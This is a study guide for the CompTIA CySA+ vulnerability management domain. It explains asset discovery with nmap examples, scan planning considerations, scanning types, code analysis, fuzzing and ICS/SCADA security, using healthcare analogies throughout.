Introduction to Book Two: Vulnerability Management (CySA+
Domain 2.0)
Purpose of This Book
This book is part of a larger structured series designed to prepare for the CompTIA Cybersecurity Analyst (CySA+)
certification while simultaneously building job-ready knowledge for real-world cybersecurity roles. Specifically, this
volume addresses Domain 2.0: Vulnerability Management.
Unlike conventional study guides that rely on repetition or jargon-heavy overviews, this book is built with a unique
mission:
To go deeper, connect more clearly, and prepare more intelligently by breaking through cybersecurity shorthand
and presenting concepts with the precision of scientific reasoning.

Focus of This Book
● Full Conceptual Understanding – All concepts are logically explained, not just named or categorized.
● Hands-On Readiness – Where applicable, tool explanations are tied to real analyst workflows, scan
output interpretation, and lab guidance.
● Strategic Risk Framing – Vulnerabilities are examined not just in terms of discovery but also risk scoring,
remediation, and organizational impact.
● Clear Accountability – Every process specifies who performs the action (SOC analyst, sysadmin,
attacker, scanner), so workflows are coherent and relatable.

Methodology and Structure
1. Depth Over Brevity
○ Every term is fully defined and unpacked, not assumed.
○ We reject cybersecurity shorthand that obscures meaning.
2. Logical Clarity
○ Concepts are presented using scientific-style reasoning, especially when cybersecurity language
is imprecise.
○ The why and how are always addressed, not just the what.
3. Analogy-Driven Learning

2
○ Especially drawing from healthcare and biological systems, where patterns like defense,
detection, isolation, and treatment mirror cybersecurity principles.
○ Analogies are used to enhance retention and spark deeper insight.
4. Real-World Integration
○ We constantly tie concepts to real-world practice: patching strategies, vulnerability prioritization,
SOC ticketing workflows, attacker tactics, etc.

5. Iterative Construction
○ Each section is written, reviewed, refined, and sometimes rewritten to reach the right level of clarity
and usefulness.
○ The user (reader) will handwrite notes into the printed version to enhance learning and retention.
6. Structured Presentation
○ Each topic is built in layers:
■ Definition
■ Expanded explanation
■ Who performs the action
■ Real-world example or analogy
■ Chart or table when helpful
■ Summary paragraph for reinforcement

7. Visual Learning Tools
○ Comparison charts, tool summaries, and vulnerability frameworks will be used consistently to
show distinctions and real use cases.

Asset Discovery in Vulnerability Management
Definition (Clear and Plain)
Asset discovery is the process of identifying all devices, systems, and endpoints that exist on a
network—whether authorized or not.
In cybersecurity, this is the first and most critical step in vulnerability management, because you cannot
secure what you don’t know exists. Before scanning for vulnerabilities, an organization must know what
assets it has, where they are, and what they’re running.

3

Why Asset Discovery Comes First
Think of this like a doctor performing a full physical before diagnosing any specific condition. If you don’t
first identify the organs, systems, and abnormalities, there&#39;s no way to target the treatment.
Similarly, in cybersecurity, vulnerability scanning is useless without asset discovery, because:
● You might miss entire subnets or shadow IT devices.
● Vulnerabilities on unknown systems will go unpatched.
● Rogue or misconfigured assets may silently introduce risk.

Step-by-Step Process of Asset Discovery

Step Action Who Performs It Goal

1 Send out network probes
(map scans)

Vulnerability scanner or
network tool

Identify active IPs

2 Fingerprint discovered
devices

Vulnerability scanner Learn what OS, services, and
software are running

3 Compare to asset inventory SOC or IT team Find unauthorized or unknown

devices

4 Flag anomalies or shadow
assets

SOC or Security Engineer Assess risk and initiate deeper

scans

Key Techniques:
Map Scans (Network Mapping)
Definition
A map scan is a network sweep that identifies which IP addresses are in use across a given IP range or
subnet.
How It Works

4

● Sends ICMP Echo Requests (ping)
● Sends TCP SYN probes to common ports (e.g., 80, 443)
● If a device responds, it is considered “up”

Real-World Analogy
Think of a map scan like knocking on every door in a neighborhood to see who answers. You’re not entering
the house (yet)—just seeing if someone’s home.
Tool Example
● nmap -sn 192.168.1.0/24
(Ping scan – no port scan, just host discovery)

Device Fingerprinting
Definition
Device fingerprinting is the process of identifying details about a system—such as its operating system,
running services, and open ports—based on how it responds to specific probes.
How It Works
● Sends packets with slight variations
● Analyzes response behavior (TTL values, TCP flags, banners)
● Matches patterns against known device fingerprints

Real-World Analogy
Like a doctor identifying a person’s age, height, and blood pressure just from a check-up, device
fingerprinting gathers information without “cutting open” the device.
Tool Example
● nmap -O 192.168.1.10
(OS detection using TCP/IP stack fingerprinting)
● nmap -sV
(Service version detection for open ports)

Why Asset Discovery Is Not Just “Step One”—It’s Continuous
Many organizations treat asset discovery as a one-time audit, but in reality:

5

● New devices join the network all the time (BYOD, cloud instances).
● Shadow IT often introduces risk.
● Asset databases become outdated quickly without automation.

SOC and Analyst Role
Security analysts must ensure that vulnerability scanners are fed accurate and current asset lists, or results
will be incomplete and misleading.

Comparison Chart: Asset Discovery Techniques

Technique Primary Purpose Method Tool
Example

Detects Unauthorized
Devices?

Map Scan (Ping
Sweep)

Find live hosts ICMP / TCP SYN nmap -sn Yes

Port Scan Find open services TCP/UDP
probing

nmap -sT, -
sU

Yes (if responsive)

OS Fingerprinting Identify system
type

TCP/IP analysis nmap -O Partially

Service
Fingerprinting

Identify running
services

Banner
grabbing

nmap -sV Partially

Summary
Asset discovery is the foundation of vulnerability management. Using map scans and device fingerprinting,
organizations identify what’s on their network, which systems are live, and how they behave. Without this
step, all vulnerability scanning efforts risk being incomplete or inaccurate.
Effective asset discovery is not a checkbox—it’s an ongoing, automated process that must be integrated into
your vulnerability management lifecycle. Tools like Nmap, Nessus, and OpenVAS help collect this
information, but the SOC team or security engineer must interpret and act on it.

6

Add-On: Banner Grabbing Output Example
Tool: nmap -sV 192.168.1.10
This command probes open ports and captures the service “banner” to identify application versions.
Sample Output:
bash
CopyEdit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/https Apache httpd 2.4.29

Interpretation:
These banners reveal the exact version of each service. From here, a vulnerability scanner (or a
manual analyst) can check whether these versions are known to be vulnerable (e.g., via CVE
databases).
Key Takeaway:
This technique is fast and highly valuable — but it’s only effective when services return banners. Some hardened
systems suppress banners or use deception techniques to mislead scanners.

Add-On: Device Fingerprinting Result Sample
Tool: nmap -O 192.168.1.10
This command performs OS detection using TCP/IP stack fingerprinting. It sends packets with slight variations and
analyzes how the device responds.
Sample Output:
OS details: Linux 3.2 - 4.9, Ubuntu 16.04 - 18.10
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

Interpretation:
Nmap is reasonably confident the host is running a Linux kernel version between 3.2 and 4.9 —
typical of Ubuntu 16.04 to 18.10. This is inferred from how the device responds to a range of probe
packets (e.g., TTL values, TCP window sizes, IP ID behavior).
Note: OS detection is not always precise, especially if the device is behind a firewall or running obfuscation tools.

Add-On: Nessus Scan Output Description

7

Tool: Nessus Professional or Nessus Essentials
Scan Type: Basic Network Vulnerability Scan
Sample Screenshot (described in text):
● Dashboard View:
○ Asset: 192.168.1.10
○ Operating System: Ubuntu 18.04
○ Open Ports: 22, 80, 443
○ Vulnerabilities:
■ 1 Critical (CVE-2020-1472: Zerologon)
■ 2 High (OpenSSH outdated, Apache 2.4.29 DoS)
■ 5 Medium
■ 3 Low
● Vulnerability Details Panel:
○ CVE-2020-1472 (Zerologon)
■ CVSS Score: 10.0 (Critical)
■ Exploit Available: Yes
■ Patch Available: Yes
■ Affected Software: Samba 4.7
■ Remediation Recommendation: Apply Samba update from vendor

Interpretation:
Nessus provides structured, actionable reports tied directly to CVE entries, with severity scoring
(CVSS), exploit availability flags, and remediation advice.
Key Takeaway:
Nessus doesn’t just find issues — it frames them for prioritization and action, making it ideal for enterprise
vulnerability management.

​​The &quot;TCP Sequence Prediction: Difficulty=261 (Good luck!)&quot; line is Nmap&#39;s way of reporting how challenging it would
be for an attacker to correctly guess the sequence numbers generated by the target system&#39;s TCP stack. Here’s a
breakdown:
● TCP Sequence Prediction:
Many network attacks, such as session hijacking, depend on accurately guessing the sequence numbers

8
used in TCP communication. If these numbers are predictable, an attacker might intercept or inject malicious
packets into an ongoing session.
● Difficulty=261:
Nmap computes a difficulty score based on various characteristics of the target’s TCP sequence
generation. A higher number indicates that the sequence numbers are more random and, therefore, much
harder to predict accurately. In this case, &quot;261&quot; suggests a fairly high level of difficulty.
● &quot;(Good luck!)&quot;:
This is Nmap’s informal, tongue-in-cheek way of saying that if someone were to attempt an attack that relies
on predicting these TCP sequence numbers, it would be very challenging due to the randomness observed.

In short, this output tells you that the target system likely has robust TCP sequence number generation, which is
beneficial from a security perspective as it reduces the risk of certain types of network attacks.
The &quot;Good luck!&quot; message is Nmap’s lighthearted way of saying:
“If you’re an attacker trying to hijack this TCP session by predicting sequence numbers — good luck
with that, because this system is doing a good job generating random, unpredictable values.”
It’s directed at the hypothetical attacker, not the defender, and it means:
● The system’s TCP sequence generation is non-trivial to predict
● Session hijacking or spoofing attacks are unlikely to succeed

So it’s actually a positive sign for the defender — and the comment is a small bit of Nmap developer humor slipped
into an otherwise technical output.

Scheduling
Definition
Scheduling in vulnerability scanning refers to the planned timing and frequency of scan execution, ensuring scans
are effective while minimizing disruption to business operations. It is one of the most critical logistical considerations
in vulnerability management.
Why It Matters
Poorly timed scans can interfere with system stability, overload networks, and even trigger outages. For example, if a
full authenticated scan runs during peak business hours, it might cause visible slowdowns, missed transactions, or
application crashes — especially on older systems or under-provisioned servers. These issues are not hypothetical;
they occur regularly in real-world environments where scanning is done without proper coordination.
Who Is Responsible
● SOC analysts or vulnerability managers typically schedule recurring scans (e.g., weekly, monthly, after
patch Tuesdays).
● System administrators often help identify appropriate scan windows based on business-critical workloads.

9
● IT change control or governance teams may require approval for scanning in sensitive or production
environments.
● Business unit leaders may request “blackout windows” when scanning should not occur (e.g., financial
quarter-end, marketing campaign launch, etc.).

Real-World Analogy (Healthcare)
Scheduling vulnerability scans is like scheduling a diagnostic test or surgical procedure. You don’t perform an MRI or
major operation while the patient is in the middle of running a marathon. Instead, you wait for a stable period, ensure
monitoring is in place, and give the body time to recover. In the same way, IT teams must scan when the network and
systems are stable and available, not when they’re under stress or serving mission-critical functions.
Best Practices for Scan Scheduling
● Run high-impact scans during off-hours (e.g., evenings or weekends).
● Use incremental scheduling to break large scans into manageable segments (e.g., one subnet per night).
● Establish emergency scanning windows that can be used when a new zero-day vulnerability is disclosed.
● Consider scan staggering, where different groups of systems are scanned on different days to distribute
load evenly.
● Maintain a scanning calendar visible to both technical and business teams, so conflicts can be anticipated
and avoided.

Key Takeaway: Scanning is not a background task that “just runs.” It must be actively scheduled,
monitored, and aligned with operational needs. Poorly scheduled scans can do more harm than good.
Operations
Definition
Operations refers to the daily functioning of IT systems and services that must be considered before initiating a
vulnerability scan. This includes how scans may affect production workloads, real-time applications, legacy
environments, or any infrastructure that cannot tolerate interruption.
Why It Matters
Vulnerability scans introduce activity onto the network — they send packets, query services, and generate load. If
this is done without regard for operational timing and system stability, it can lead to:
● Service slowdowns or unavailability
● Unintended system restarts or crashes
● User complaints and business disruption
● Conflict with scheduled maintenance or deployments
● False alarms in monitoring tools or SIEM systems

10

Poorly coordinated scanning can degrade trust in the security team and even harm business outcomes.
Who Manages Operational Impact?
● SOC analysts or vulnerability management staff are responsible for configuring scans.
● System administrators communicate which assets are sensitive to scanning pressure.
● IT operations or DevOps teams monitor for performance anomalies during scanning windows.
● Change control boards (CCBs) may require advance approval of scans in production environments.

Real-World Analogy (Healthcare)
Running a vulnerability scan is like introducing a mild diagnostic stressor to a biological system — such as
administering contrast dye during imaging or performing a physical stress test. You don’t do this without ensuring the
patient is stable. Likewise, you don’t scan business-critical servers during peak operations without safeguards in
place.
Best Practices for Operationally-Aware Scanning
● Avoid scanning mission-critical systems during work hours or active processing windows.
● Communicate scanning plans to stakeholders in advance so they can prepare or raise concerns.
● Use low-impact scanning modes (e.g., safe checks, fewer concurrent probes) when targeting fragile
systems.
● Review previous scan history or system logs to identify devices that have reacted poorly in the past.
● Always scan test environments first when introducing new scanning configurations or tools.

Key Takeaway: Vulnerability scanning cannot exist in a vacuum. It must be harmonized with
operations. Scanning without understanding operational impact risks damaging the very systems
you&#39;re trying to protect.
Performance (continued)
Why It Matters
Vulnerability scanners operate by sending large volumes of traffic, requesting service information, and sometimes
testing resource-intensive protocols. This activity can:
● Overwhelm underpowered devices
● Cause applications to lag or temporarily crash
● Degrade user experience during working hours
● Affect bandwidth availability on already-busy segments
● Create system log bloat or overload local storage with scan-related queries

11
If not tuned properly, performance issues caused by scanning can result in denial of service conditions, particularly
in environments with legacy systems, low-bandwidth links, or resource-sensitive applications.
Who Oversees Performance Risk?
● Vulnerability analysts configure scan settings (intensity, thread count, timeouts)
● Network engineers monitor bandwidth impact during scan windows
● System administrators identify low-resource devices that may need special handling
● IT operations staff may throttle traffic or segment networks to reduce scan impact

Real-World Analogy (Healthcare)
This is like administering multiple tests or procedures to a recovering patient. If too many diagnostics are performed
at once, the patient’s strength is depleted, and recovery slows. Similarly, when too many scan operations are
launched without regard to system performance, machines can’t keep up and may fail in ways that affect business
continuity.
Best Practices for Performance-Sensitive Scanning
● Throttling: Limit the number of simultaneous probes or targets being scanned.
● Scan windows: Run intensive scans at night, on weekends, or during maintenance periods.
● Incremental scans: Divide large networks into smaller scan groups.
● Safe mode or “light” scan options: Reduce load by disabling aggressive tests.
● Monitoring during scans: Watch for CPU/memory spikes and network saturation in real time.

Key Takeaway: Scans must be powerful enough to detect vulnerabilities — but not so aggressive that
they cause outages. Tuning for performance is a critical part of making scanning safe, repeatable, and
enterprise-ready.

Sensitivity Levels
Definition
Sensitivity levels refer to the relative criticality, confidentiality, or fragility of the systems and data being scanned.
In vulnerability management, this affects how aggressively you scan, what tools you use, and how results are
interpreted.
Why It Matters
Not all systems should be treated equally. Scanning a sandboxed developer VM is vastly different from scanning a
domain controller, a database containing patient records, or a life-critical medical device. The scan itself might
unintentionally disrupt a sensitive system or create a false sense of safety if the scan avoids probing high-risk areas.

12

Who Assesses Sensitivity?
● Asset owners and data custodians define system criticality and data classification.
● Security teams consult asset inventories and data maps to categorize sensitivity.
● Vulnerability managers use this information to configure scan intensity and authentication levels.
● Compliance officers may apply legal or regulatory sensitivity designations (e.g., PCI, HIPAA, CUI).

Real-World Analogy (Healthcare)
This is like determining how invasive a diagnostic procedure should be based on the patient’s stability and condition.
You wouldn’t apply the same imaging protocol to a healthy athlete and a fragile ICU patient. Similarly, in IT, some
systems require delicate handling — or may need to be excluded from scanning entirely and monitored in other ways.
Best Practices for Handling Sensitivity Levels
● Classify systems into tiers (e.g., critical infrastructure, business systems, test/dev) before scanning.
● For high-sensitivity systems, use credentialed scans with safe-checks instead of brute-force probing.
● Consider using agent-based scans or passive monitoring for systems that can’t tolerate active scanning.
● Document exceptions when certain systems must be excluded, and ensure compensating controls are in
place.

Key Takeaway: A one-size-fits-all scanning policy is dangerous. Sensitivity must guide how, when,
and whether a system is scanned. Careful consideration prevents operational harm and ensures
coverage is meaningful.

Segmentation
Definition
Segmentation refers to the logical or physical division of a network into isolated zones or sections, such as by
business function, risk level, or compliance scope. In vulnerability management, segmentation affects what can be
scanned, from where, and how results should be interpreted.
Why It Matters
Scanning across segmented networks isn’t always straightforward. Firewalls, VLAN boundaries, or air-gapped
environments can block scan traffic or limit visibility. If segmentation isn’t accounted for, scans may miss critical
assets, give false negatives, or overload isolated segments with unintended traffic.
For example, a scan launched from a corporate network may not reach servers in a PCI zone without specific firewall
rules. Similarly, cloud-hosted environments may require credentialed or agent-based scans due to segmentation by
design.
Who Handles Segmentation Awareness?
● Network engineers implement and maintain segmentation rules.

13

● SOC analysts must identify and understand segmentation boundaries before scanning.
● Scan operators work with IT teams to ensure visibility and safe access across segments.
● Security architects design segmentation to reduce lateral movement and scope compliance zones.

Real-World Analogy (Healthcare)
Segmentation is like isolating hospital departments — you wouldn’t allow a general visitor to freely walk into the ICU
or surgical suite. You need clear boundaries, and any diagnostic process must account for which zones are
accessible, protected, or entirely off-limits.
Best Practices for Scanning Across Segments
● Identify all scan targets and their network locations in advance.
● Use scan engines placed inside each segment if remote scanning is blocked.
● Coordinate with firewall administrators to allow necessary scan traffic temporarily.
● Use agent-based scans in highly restricted zones.
● Document segmentation-related scan limitations and apply compensating controls.

Key Takeaway: Network segmentation is essential for security — but it complicates vulnerability
scanning. Without accounting for segmentation, scans may be incomplete or disruptive.

Regulatory Requirements
Definition
Regulatory requirements are legal, industry, or contractual obligations that dictate how vulnerability scanning
must be performed, how data must be handled, and how often assessments must occur.
Why It Matters
Many industries are bound by strict frameworks that require documented vulnerability management practices. Failing
to comply can lead to:
● Fines, audits, or legal action
● Breach of contractual obligations
● Disqualification from certifications or vendor networks
● Reputational damage and loss of customer trust

These requirements often define scanning frequency, data retention, access controls, and reporting standards.
Who Ensures Compliance?

14

● Compliance officers interpret regulatory requirements and align them with security practices.
● Vulnerability managers must document scan scope, timing, and remediation workflows.
● Auditors and assessors review scan logs, reports, and exception justifications.
● Legal and governance teams validate that processes meet the letter of each regulation.

Real-World Analogy (Healthcare)
This is like being subject to medical board regulations or hospital accreditation. It’s not enough to know how to treat
patients — you must document, comply with standards, and prove that you followed required procedures.
Common Regulatory Influences on Vulnerability Management
● PCI DSS (Payment Card Industry Data Security Standard): Requires quarterly external scans by an
approved scanning vendor (ASV).
● HIPAA (Health Insurance Portability and Accountability Act): Imposes safeguards on systems handling
protected health information (PHI).
● FISMA (Federal Information Security Management Act): Mandates vulnerability scanning for federal
systems.
● SOX, CMMC, and GDPR may also apply based on business type and geography.

Key Takeaway: Vulnerability scanning isn’t just a best practice — in many sectors, it’s a legal
requirement. Security teams must map scan activity directly to compliance standards and ensure
documentation holds up under scrutiny.

Internal vs. External Scanning
Definition
Internal scanning refers to vulnerability scans conducted from inside the organization&#39;s network — targeting
systems behind the firewall such as workstations, internal servers, and development environments.
External scanning refers to scans conducted from outside the network perimeter — usually from the internet —
targeting public-facing assets like websites, email servers, and VPN gateways.
Why It Matters
Internal and external scans expose different types of risk.
● External scans reveal vulnerabilities that an internet-based attacker could exploit.
● Internal scans simulate insider threats, lateral movement, or what an attacker might find after breaching the
perimeter.
Focusing on one and neglecting the other creates blind spots in the security posture.

15

Who Performs These Scans?
● External scans may be performed by third-party services or cloud-based scanning tools (e.g., Tenable.io,
Qualys).
● Internal scans are typically managed by the organization’s own security team using scanners like Nessus
or OpenVAS.
● Compliance teams often oversee scheduling and documentation for both types.

Real-World Analogy (Healthcare)
Think of external scanning as checking the building from the street — are the doors locked? Are there broken
windows?
Internal scanning is like walking the halls with a badge — can you open unauthorized rooms? Are medication
cabinets left unlocked?
Key Differences — Bullet Point Comparison
● Perspective:
○ External = Attacker’s view from outside the network
○ Internal = Insider’s view from within the network
● Typical Targets:
○ External = Web servers, email servers, remote access gateways (e.g., VPNs)
○ Internal = File servers, Active Directory, internal apps, endpoints
● Purpose:
○ External = Identify exposed services and perimeter vulnerabilities
○ Internal = Detect internal misconfigurations, missing patches, lateral movement opportunities
● Tools Commonly Used:
○ External = Web application scanners, cloud-based scanners, approved scanning vendors (ASVs)
○ Internal = On-prem scanners like Nessus, OpenVAS, and agent-based scanning tools
● Regulatory Importance:
○ External = Often mandated by frameworks like PCI DSS
○ Internal = Required for maintaining internal security hygiene and reducing breach impact

Key Takeaway: A mature vulnerability management program includes both internal and external
scans. They answer two different but equally important questions:
What can an attacker see? and What can an attacker do if they get in?

16

Agent vs. Agentless Scanning
Definition
In vulnerability management, agent-based scanning uses a lightweight software component installed on
each target system to collect data locally and send it to the scanner.
Agentless scanning, on the other hand, performs scans over the network without installing anything on the
target — using remote probes, protocols, or credentials to gather system information.
Why It Matters
Each method has strengths and limitations. Depending on the environment — size, complexity, security
policies, and network segmentation — one method may be more effective or feasible than the other.
● Agent-based scanning can provide deep visibility, even in segmented or mobile environments.
● Agentless scanning avoids the overhead of deployment and is often easier to manage at small to
mid-scale.

Who Uses or Decides?
● Vulnerability managers select the appropriate scanning method based on environment type and
coverage needs.
● IT administrators or DevOps teams handle agent installation, updates, and health checks.
● Compliance teams may require evidence of agent presence or approval for remote scans, especially
in regulated sectors.

Real-World Analogy (Healthcare)
This is like choosing between remote imaging (e.g., X-ray from outside the body) and wearable monitoring
devices (e.g., heart monitor patch).
An agentless scan observes from a distance. An agent-based scan collects from inside the system — more
detail, but more overhead.
Key Differences — Bullet Point Comparison
● Installation Required:
○ Agent = Yes, software must be deployed and maintained on each asset
○ Agentless = No installation; scans remotely over network protocols
● Visibility:
○ Agent = Deep visibility, including patch level, process activity, local logs
○ Agentless = Limited to what can be probed externally or over the network
● Use Cases:

17

○ Agent = Ideal for laptops, remote workers, cloud workloads, segmented zones
○ Agentless = Best for fixed infrastructure on a flat or well-permissioned network
● Performance Impact:
○ Agent = Very low impact; scans are distributed
○ Agentless = Higher load on scanning engine and network, especially during large sweeps
● Management Complexity:
○ Agent = Requires lifecycle management (install, update, uninstall)
○ Agentless = Easier to start, but may struggle in complex environments

Key Takeaway: Agent-based and agentless scanning are complementary — not competing.
Use agents when deep, continuous visibility is needed, and use agentless when you need
rapid, broad visibility with minimal setup. Most mature environments use both methods
strategically.
Credentialed vs. Non-Credentialed Scanning
Definition
Credentialed scanning (also called authenticated scanning) uses valid login credentials — typically
administrative — to access systems and retrieve detailed vulnerability information from inside the operating
system or application.
Non-credentialed scanning (unauthenticated scanning) observes and probes from the outside, gathering
whatever information is publicly visible over the network without logging into the target.
Why It Matters
Credentialed and non-credentialed scans serve different purposes and produce different levels of insight:
● Credentialed scans provide deep and accurate results, detecting software vulnerabilities, missing
patches, weak configurations, and hidden services.
● Non-credentialed scans show what an attacker without access can see, helping assess exposure to
external reconnaissance and probing.

The two approaches are complementary — one simulates a trusted user, the other an outsider.
Who Sets This Up?
● Vulnerability analysts configure scanning tools and supply credentials.
● System administrators may create and manage scanning accounts with read-only privileges.
● Compliance teams may require proof that scans are authenticated for full vulnerability coverage.
● Security engineers ensure credentialed scans do not compromise system integrity or overload
resources.

18

Real-World Analogy (Healthcare)
Credentialed scanning is like conducting a full patient exam with medical records in hand — you check
vitals, labs, and internal scans.
Non-credentialed scanning is like trying to evaluate the patient by watching them walk into the clinic —
useful, but limited to surface observations.
Key Differences — Bullet Point Comparison
● Access Level:
○ Credentialed = Uses authorized login credentials to access system internals
○ Non-credentialed = Accesses only what’s publicly visible from the network
● Visibility:
○ Credentialed = Deep insight into OS version, patch status, software inventory, and local
configuration
○ Non-credentialed = Limited to open ports, banners, and externally exposed vulnerabilities
● Accuracy:
○ Credentialed = High accuracy, fewer false positives, more context for risk scoring
○ Non-credentialed = Greater likelihood of false positives or incomplete visibility
● Use Cases:
○ Credentialed = Internal compliance scans, patch verification, policy audits
○ Non-credentialed = External perimeter scans, penetration test simulation, anonymous
exposure assessment

● Setup Complexity:
○ Credentialed = Requires secure credential management and host trust relationships
○ Non-credentialed = Easier to launch, lower setup time, but lower fidelity

Key Takeaway: Credentialed scans reveal what’s really vulnerable. Non-credentialed scans
reveal what attackers can see. Both are necessary for a complete and realistic vulnerability
management strategy.

Passive vs. Active Scanning
Definition

19
Active scanning involves sending probes, requests, or packets to a target system to elicit responses that
reveal vulnerabilities or system details.
Passive scanning observes network traffic or system behavior without sending any traffic to the target,
analyzing what is already occurring in the environment.
Why It Matters
Both techniques serve distinct roles in a well-rounded vulnerability management strategy:
● Active scanning is proactive and comprehensive — it uncovers weaknesses even on quiet or
unused systems.
● Passive scanning is stealthy, non-disruptive, and useful in fragile or highly regulated environments
where active probes could cause outages or compliance concerns.

Passive scanning also detects systems or devices not currently being scanned, including rogue devices,
BYOD, and unauthorized hosts.
Who Uses or Configures This?
● SOC analysts and vulnerability managers determine when passive or active techniques are
appropriate.
● Network engineers may configure traffic taps or mirror ports for passive tools.
● Compliance and risk teams often approve passive methods for sensitive zones like ICS/SCADA
networks or medical devices.
● Incident response teams may use passive scanning to detect unexpected services or attack
signatures without tipping off the adversary.

Real-World Analogy (Healthcare)
Active scanning is like ordering lab tests or conducting a physical exam — it directly interacts with the
patient to get results.
Passive scanning is like monitoring a heart rate or respiratory monitor in the ICU — you&#39;re watching what&#39;s
happening without interfering.
Key Differences — Bullet Point Comparison
● Interaction with Target:
○ Active = Sends traffic, directly probes systems
○ Passive = Observes traffic without interacting
● Visibility:
○ Active = Detects dormant vulnerabilities, missing patches, and insecure services
○ Passive = Sees only what is in use or transmitting on the network
● Disruption Risk:

20

○ Active = Can cause slowdowns or crashes on sensitive systems
○ Passive = Zero disruption; completely invisible to endpoints
● Detection Capability:
○ Active = More thorough; ideal for patch validation and CVE correlation
○ Passive = Useful for identifying rogue systems, policy violations, or unapproved software
● Use Cases:
○ Active = Routine vulnerability scans, regulatory compliance, internal audits
○ Passive = Monitoring sensitive environments (e.g., ICS, healthcare), continuous detection of
shadow IT

Key Takeaway: Use active scanning to find what systems aren&#39;t telling you. Use passive
scanning to detect what systems are already doing — especially in environments where
probing is too risky. Both are vital tools in the modern vulnerability management arsenal.

Static vs. Dynamic Analysis
Definition
Static analysis involves examining code, configuration, or binaries without executing the program —
typically using automated tools to inspect syntax, structure, dependencies, and logic for potential flaws.
Dynamic analysis involves observing the system or application while it is running, usually in a test
environment, to identify behavioral issues, memory corruption, or runtime vulnerabilities.
Why It Matters
Each method detects different types of vulnerabilities:
● Static analysis excels at uncovering logic flaws, hardcoded credentials, and insecure coding
patterns before deployment.
● Dynamic analysis catches runtime issues like input validation failures, memory leaks, or unexpected
behavior only visible during execution.

Combining both approaches strengthens software assurance and vulnerability coverage.
Who Performs These Analyses?
● Application security teams and DevSecOps engineers run static analysis as part of secure code
reviews and CI/CD pipelines.
● Security researchers, pen testers, and malware analysts use dynamic analysis to observe real-time
behavior of executables or suspected malware.
● Software developers may run both during internal QA cycles for security hardening.

21

Real-World Analogy (Healthcare)
Static analysis is like reviewing a surgical blueprint or medication formula before use. Dynamic analysis is
like monitoring the patient’s response during the actual procedure. Both are essential: one validates design,
the other validates outcome.
Key Differences — Bullet Point Comparison
● Execution:
○ Static = No code execution required
○ Dynamic = Observes running code
● Environment:
○ Static = Source code or binaries analyzed offline
○ Dynamic = Performed in controlled runtime environments (e.g., sandbox)
● Vulnerabilities Found:
○ Static = Insecure coding practices, logic flaws, hardcoded secrets
○ Dynamic = Buffer overflows, injection flaws, memory errors, timing attacks
● Tool Examples:
○ Static = SonarQube, Fortify, CodeQL
○ Dynamic = Burp Suite (scanner mode), Valgrind, interactive debuggers

Key Takeaway: Static and dynamic analysis are complementary. Static prevents flawed code
from being deployed. Dynamic catches what static misses during runtime. Used together, they
dramatically improve security posture.

Reverse Engineering
Definition
Reverse engineering is the process of analyzing a compiled binary or application to determine how it works,
often without access to the source code. It’s used to understand unknown software, extract functionality, or
locate vulnerabilities and malicious behavior.
Why It Matters
Reverse engineering is critical for:
● Malware analysis — to understand what an executable is doing without triggering it
● Proprietary system assessment — when source code is unavailable

22

● Exploit development — to locate memory manipulation opportunities
● Software verification — to detect unauthorized features or intellectual property violations

Who Performs It?
● Security researchers, malware analysts, and exploit developers
● Red team members analyzing proprietary firmware or software
● SOC and incident response teams when analyzing unknown binaries or suspicious behavior

Real-World Analogy (Healthcare)
This is like performing an autopsy on a mysterious organism to see how it works — no instruction manual,
just the physical form and your tools. You disassemble, examine, and deduce.
Key Concepts and Techniques
● Disassembly using tools like IDA Pro or Ghidra
● Hex inspection and string extraction
● Function flow tracing
● Control flow graph analysis
● Behavioral emulation in sandboxes or virtual machines

Key Takeaway: Reverse engineering is a deep-dive forensic technique — not used in routine
scanning, but essential for threat research, malware defense, and exploit discovery.

Fuzzing
Definition
Fuzzing is an automated testing technique where a system or application is fed unexpected, malformed, or
random inputs to see how it behaves — with the goal of uncovering crashes, hangs, memory corruption, or
logic flaws.
Why It Matters
Fuzzing is highly effective for:
● Detecting zero-day vulnerabilities (especially in parsing libraries or input handlers)
● Uncovering undocumented edge cases in complex systems
● Validating the resilience of protocol implementations and file format handlers

23

Fuzzing doesn’t rely on known vulnerabilities — it creates new ones through abnormal input.
Who Uses Fuzzing?
● Security researchers and exploit developers looking for novel bugs
● QA engineers and DevSecOps teams for input hardening
● Vulnerability labs in software vendors or security product testing teams

Real-World Analogy (Healthcare)
Fuzzing is like running a stress test or allergic challenge — you intentionally push the system to extremes or
expose it to unexpected stimuli to observe how it breaks.
Key Characteristics of Fuzzing
● May be black-box (no knowledge of internals) or white-box (aware of source code or structure)
● Generates thousands or millions of test cases
● Often targets file formats, network protocols, APIs, or command-line inputs
● Tools include AFL (American Fuzzy Lop), Peach Fuzzer, and Microsoft&#39;s SAGE

Key Takeaway: Fuzzing is a powerful, discovery-based technique. It finds vulnerabilities you
didn’t know to look for — making it invaluable for robust, proactive defense.

Critical Infrastructure, OT, ICS, and SCADA
Definition
Critical infrastructure refers to the essential systems and assets whose disruption would have
a debilitating impact on national security, economic security, public health, or safety. This
includes sectors like energy, water, transportation, communications, and healthcare.
Within critical infrastructure, security professionals often deal with:
● Operational Technology (OT): Hardware and software that monitors and controls physical processes
— such as valves, motors, pumps, and sensors.
● Industrial Control Systems (ICS): A broad category of control systems used in industrial processes,
including SCADA and DCS (Distributed Control Systems).
● SCADA (Supervisory Control and Data Acquisition): A specialized type of ICS used for remote
monitoring and control of large-scale systems like power grids, pipelines, and water treatment
facilities.

24

Why It Matters
These systems are highly sensitive and often not designed with cybersecurity in mind. Many were built
decades ago for availability and reliability — not encryption, segmentation, or zero trust.
In modern times, however, ICS and SCADA environments are increasingly connected to corporate networks
and even the internet, which exposes them to cyber threats they were never meant to defend against.
Who Manages and Secures These Systems?
● OT engineers operate and maintain physical systems (e.g., in plants or field environments).
● ICS specialists design and integrate control logic.
● Cybersecurity teams must coordinate scanning, monitoring, and incident response with OT teams —
often with extremely limited scanning options.
● National-level regulators and infrastructure providers often set compliance frameworks and security
standards.

Real-World Analogy (Healthcare)
Protecting ICS/SCADA is like defending life support machines in a hospital — they must remain operational
at all times. Standard IT patching or scanning techniques could crash them. Security must be adapted to
their fragility, but protection is still essential.
Key Characteristics of These Systems
● Availability is the top priority — even more than confidentiality
